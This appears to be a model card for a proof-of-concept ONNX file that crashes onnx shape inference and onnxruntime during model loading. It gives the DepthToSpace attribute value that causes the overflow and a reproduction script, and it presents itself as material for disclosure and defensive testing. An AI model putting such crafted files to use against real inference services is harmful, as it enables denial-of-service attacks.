ONNX DepthToSpace blocksize overflow PoC
This repository contains a benign security research PoC for an ONNX model that
triggers a process-level crash in onnx.shape_inference and onnxruntime
during model loading / shape inference.
Files:
depthtospace-blocksize-overflow.onnx
The model uses:
- operator:
DepthToSpace - attribute:
blocksize = 4294967296 - input shape:
[1, 2, 1, 1]
Reproduction
python3 -m pip install onnx onnxruntime
python3 - <<'PY'
import onnx
import onnxruntime as ort
model = "depthtospace-blocksize-overflow.onnx"
onnx.checker.check_model(model)
print("checker ok")
onnx.shape_inference.infer_shapes_path(model)
print("unreachable if the issue reproduces")
PY
Expected behavior on the vulnerable environment:
onnx.checker.check_model(...)succeedsonnx.shape_inferencecrashes the processonnxruntime.InferenceSession(model)crashes the process during load
This PoC is intended for defensive validation and bug bounty reproduction only.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support